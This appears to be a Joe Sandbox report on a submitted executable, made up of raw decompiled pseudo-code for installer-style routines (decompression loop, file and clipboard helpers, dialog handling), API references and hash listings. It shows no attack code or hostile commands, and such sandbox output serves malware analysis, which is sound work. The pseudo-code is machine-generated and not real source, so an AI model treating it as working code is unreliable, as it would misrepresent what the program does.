                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      														 *__esi = __dx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														L111:
                      														_t368 = __ebp - 0x48;
                      														 *_t368 =  *(__ebp - 0x48) + 1;
                      														__eflags =  *_t368;
                      														goto L112;
                      													} else {
                      														goto L109;
                      													}
                      												}
                      												__ecx =  *(__ebp - 0xc);
                      												__ebx = __ebx + __ebx;
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      													__ecx =  *(__ebp - 0x10);
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      													__ebx = __ebx | 0x00000001;
                      													__eflags = __ebx;
                      													 *(__ebp - 0x44) = __ebx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													L101:
                      													_t338 = __ebp - 0x48;
                      													 *_t338 =  *(__ebp - 0x48) - 1;
                      													__eflags =  *_t338;
                      													goto L102;
                      												} else {
                      													goto L99;
                      												}
                      											}
                      											__edx =  *(__ebp - 4);
                      											__eax = __eax - __ebx;
                      											 *(__ebp - 0x40) = __ecx;
                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      											goto L108;
                      										case 0x1a:
                      											L56:
                      											__eflags =  *(__ebp - 0x64);
                      											if( *(__ebp - 0x64) == 0) {
                      												 *(__ebp - 0x88) = 0x1a;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x68);
                      											__al =  *(__ebp - 0x5c);
                      											__edx =  *(__ebp - 8);
                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      											 *( *(__ebp - 0x68)) = __al;
                      											__ecx =  *(__ebp - 0x14);
                      											 *(__ecx +  *(__ebp - 8)) = __al;
                      											__eax = __ecx + 1;
                      											__edx = 0;
                      											_t192 = __eax %  *(__ebp - 0x74);
                      											__eax = __eax /  *(__ebp - 0x74);
                      											__edx = _t192;
                      											goto L79;
                      										case 0x1b:
                      											L75:
                      											__eflags =  *(__ebp - 0x64);
                      											if( *(__ebp - 0x64) == 0) {
                      												 *(__ebp - 0x88) = 0x1b;
                      												goto L170;
                      											}
                      											__eax =  *(__ebp - 0x14);
                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      											__eflags = __eax -  *(__ebp - 0x74);
                      											if(__eax >=  *(__ebp - 0x74)) {
                      												__eax = __eax +  *(__ebp - 0x74);
                      												__eflags = __eax;
                      											}
                      											__edx =  *(__ebp - 8);
                      											__cl =  *(__eax + __edx);
                      											__eax =  *(__ebp - 0x14);
                      											 *(__ebp - 0x5c) = __cl;
                      											 *(__eax + __edx) = __cl;
                      											__eax = __eax + 1;
                      											__edx = 0;
                      											_t274 = __eax %  *(__ebp - 0x74);
                      											__eax = __eax /  *(__ebp - 0x74);
                      											__edx = _t274;
                      											__eax =  *(__ebp - 0x68);
                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      											_t283 = __ebp - 0x64;
                      											 *_t283 =  *(__ebp - 0x64) - 1;
                      											__eflags =  *_t283;
                      											 *( *(__ebp - 0x68)) = __cl;
                      											L79:
                      											 *(__ebp - 0x14) = __edx;
                      											goto L80;
                      										case 0x1c:
                      											while(1) {
                      												L123:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													break;
                      												}
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__edx =  *(__ebp - 8);
                      												__cl =  *(__eax + __edx);
                      												__eax =  *(__ebp - 0x14);
                      												 *(__ebp - 0x5c) = __cl;
                      												 *(__eax + __edx) = __cl;
                      												__eax = __eax + 1;
                      												__edx = 0;
                      												_t414 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t414;
                      												__eax =  *(__ebp - 0x68);
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      												__eflags =  *(__ebp - 0x30);
                      												 *( *(__ebp - 0x68)) = __cl;
                      												 *(__ebp - 0x14) = _t414;
                      												if( *(__ebp - 0x30) > 0) {
                      													continue;
                      												} else {
                      													L80:
                      													 *(__ebp - 0x88) = 2;
                      													goto L1;
                      												}
                      											}
                      											 *(__ebp - 0x88) = 0x1c;
                      											goto L170;
                      									}
                      								}
                      								L171:
                      								_t535 = _t534 | 0xffffffff;
                      								goto L172;
                      							}
                      						}
                      					}
                      				}
                      			}













                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004066bb
                      0x004066b8

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                      • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                      • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                      • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E0040575C(CHAR* _a4, long _a8, long _a12) {
                      				signed int _t5;
                      				void* _t6;
                      
                      				_t5 = GetFileAttributesA(_a4); // executed
                      				asm("sbb ecx, ecx");
                      				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                      				return _t6;
                      			}






                      APIs
                      • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\nji3Lg1ot6.exe,80000000,00000003), ref: 00405760
                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$AttributesCreate
                      • String ID:
                      • API String ID: 415043291-0
                      • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                      • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                      • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                      • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040573D(CHAR* _a4) {
                      				signed char _t3;
                      
                      				_t3 = GetFileAttributesA(_a4); // executed
                      				if(_t3 != 0xffffffff) {
                      					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                      				}
                      				return _t3;
                      			}





                      APIs
                      • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                      • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                      • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                      • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004031A8(void* _a4, long _a8) {
                      				int _t6;
                      				long _t10;
                      
                      				_t10 = _a8;
                      				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                      				if(_t6 == 0 || _a8 != _t10) {
                      					return 0;
                      				} else {
                      					return 1;
                      				}
                      			}






                      APIs
                      • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                      • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                      • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                      • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004031DA(long _a4) {
                      				long _t2;
                      
                      				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                      				return _t2;
                      			}





                      APIs
                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                      • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                      • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                      • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      C-Code - Quality: 96%
                      			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                      				struct HWND__* _v8;
                      				long _v12;
                      				struct tagRECT _v28;
                      				void* _v36;
                      				signed int _v40;
                      				int _v44;
                      				int _v48;
                      				signed int _v52;
                      				int _v56;
                      				void* _v60;
                      				void* _v68;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				long _t87;
                      				unsigned int _t92;
                      				unsigned int _t93;
                      				int _t94;
                      				int _t95;
                      				long _t98;
                      				void* _t101;
                      				intOrPtr _t112;
                      				intOrPtr _t123;
                      				struct HWND__* _t127;
                      				int _t149;
                      				int _t150;
                      				struct HWND__* _t154;
                      				struct HWND__* _t158;
                      				struct HMENU__* _t160;
                      				long _t162;
                      				void* _t163;
                      				short* _t164;
                      
                      				_t154 =  *0x423684; // 0x0
                      				_t149 = 0;
                      				_v8 = _t154;
                      				if(_a8 != 0x110) {
                      					__eflags = _a8 - 0x405;
                      					if(_a8 == 0x405) {
                      						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                      					}
                      					__eflags = _a8 - 0x111;
                      					if(_a8 != 0x111) {
                      						L17:
                      						__eflags = _a8 - 0x404;
                      						if(_a8 != 0x404) {
                      							L25:
                      							__eflags = _a8 - 0x7b;
                      							if(_a8 != 0x7b) {
                      								goto L20;
                      							}
                      							__eflags = _a12 - _t154;
                      							if(_a12 != _t154) {
                      								goto L20;
                      							}
                      							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                      							__eflags = _t87 - _t149;
                      							_a8 = _t87;
                      							if(_t87 <= _t149) {
                      								L37:
                      								return 0;
                      							}
                      							_t160 = CreatePopupMenu();
                      							AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
                      							_t92 = _a16;
                      							__eflags = _t92 - 0xffffffff;
                      							if(_t92 != 0xffffffff) {
                      								_t150 = _t92;
                      								_t93 = _t92 >> 0x10;
                      								__eflags = _t93;
                      								_t94 = _t93;
                      							} else {
                      								GetWindowRect(_t154,  &_v28);
                      								_t150 = _v28.left;
                      								_t94 = _v28.top;
                      							}
                      							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                      							_t162 = 1;
                      							__eflags = _t95 - 1;
                      							if(_t95 == 1) {
                      								_v60 = _t149;
                      								_v48 = 0x420498;
                      								_v44 = 0xfff;
                      								_a4 = _a8;
                      								do {
                      									_a4 = _a4 - 1;
                      									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                      									__eflags = _a4 - _t149;
                      									_t162 = _t162 + _t98 + 2;
                      								} while (_a4 != _t149);
                      								OpenClipboard(_t149);
                      								EmptyClipboard();
                      								_t101 = GlobalAlloc(0x42, _t162);
                      								_a4 = _t101;
                      								_t163 = GlobalLock(_t101);
                      								do {
                      									_v48 = _t163;
                      									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                      									 *_t164 = 0xa0d;
                      									_t163 = _t164 + 2;
                      									_t149 = _t149 + 1;
                      									__eflags = _t149 - _a8;
                      								} while (_t149 < _a8);
                      								GlobalUnlock(_a4);
                      								SetClipboardData(1, _a4);
                      								CloseClipboard();
                      							}
                      							goto L37;
                      						}
                      						__eflags =  *0x42366c - _t149; // 0x0
                      						if(__eflags == 0) {
                      							ShowWindow( *0x423ea8, 8);
                      							__eflags =  *0x423f2c - _t149; // 0x0
                      							if(__eflags == 0) {
                      								_t112 =  *0x41fc68; // 0x0
                      								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
                      							}
                      							E00403E10(1);
                      							goto L25;
                      						}
                      						 *0x41f860 = 2;
                      						E00403E10(0x78);
                      						goto L20;
                      					} else {
                      						__eflags = _a12 - 0x403;
                      						if(_a12 != 0x403) {
                      							L20:
                      							return E00403E9E(_a8, _a12, _a16);
                      						}
                      						ShowWindow( *0x423670, _t149);
                      						ShowWindow(_t154, 8);
                      						E00403E6C(_t154);
                      						goto L17;
                      					}
                      				}
                      				_v52 = _v52 | 0xffffffff;
                      				_v40 = _v40 | 0xffffffff;
                      				_v60 = 2;
                      				_v56 = 0;
                      				_v48 = 0;
                      				_v44 = 0;
                      				asm("stosd");
                      				asm("stosd");
                      				_t123 =  *0x423eb0; // 0x4de368
                      				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                      				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                      				 *0x423670 = GetDlgItem(_a4, 0x403);
                      				 *0x423668 = GetDlgItem(_a4, 0x3ee);
                      				_t127 = GetDlgItem(_a4, 0x3f8);
                      				 *0x423684 = _t127;
                      				_v8 = _t127;
                      				E00403E6C( *0x423670);
                      				 *0x423674 = E004046C5(4);
                      				 *0x42368c = 0;
                      				GetClientRect(_v8,  &_v28);
                      				_v52 = _v28.right - GetSystemMetrics(0x15);
                      				SendMessageA(_v8, 0x101b, 0,  &_v60);
                      				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                      				if(_a8 >= 0) {
                      					SendMessageA(_v8, 0x1001, 0, _a8);
                      					SendMessageA(_v8, 0x1026, 0, _a8);
                      				}
                      				if(_a12 >= _t149) {
                      					SendMessageA(_v8, 0x1024, _t149, _a12);
                      				}
                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                      				_push(0x1b);
                      				E00403E37(_a4);
                      				if(( *0x423eb8 & 0x00000003) != 0) {
                      					ShowWindow( *0x423670, _t149);
                      					if(( *0x423eb8 & 0x00000002) != 0) {
                      						 *0x423670 = _t149;
                      					} else {
                      						ShowWindow(_v8, 8);
                      					}
                      					E00403E6C( *0x423668);
                      				}
                      				_t158 = GetDlgItem(_a4, 0x3ec);
                      				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                      				if(( *0x423eb8 & 0x00000004) != 0) {
                      					SendMessageA(_t158, 0x409, _t149, _a12);
                      					SendMessageA(_t158, 0x2001, _t149, _a8);
                      				}
                      				goto L37;
                      			}


                      APIs
                      • GetDlgItem.USER32 ref: 00404FC0
                      • GetDlgItem.USER32 ref: 00404FCF
                      • GetClientRect.USER32 ref: 0040500C
                      • GetSystemMetrics.USER32 ref: 00405014
                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
                      • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
                      • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                      • ShowWindow.USER32(?,00000008), ref: 004050B0
                      • GetDlgItem.USER32 ref: 004050D1
                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
                      • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
                      • GetDlgItem.USER32 ref: 00404FDE
                        • Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A
                      • GetDlgItem.USER32 ref: 00405123
                      • CreateThread.KERNEL32 ref: 00405131
                      • CloseHandle.KERNEL32(00000000), ref: 00405138
                      • ShowWindow.USER32(00000000), ref: 0040515C
                      • ShowWindow.USER32(00000000,00000008), ref: 00405161
                      • ShowWindow.USER32(00000008), ref: 004051A8
                      • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 004051DA
                      • CreatePopupMenu.USER32 ref: 004051EB
                      • AppendMenuA.USER32 ref: 00405200
                      • GetWindowRect.USER32 ref: 00405213
                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
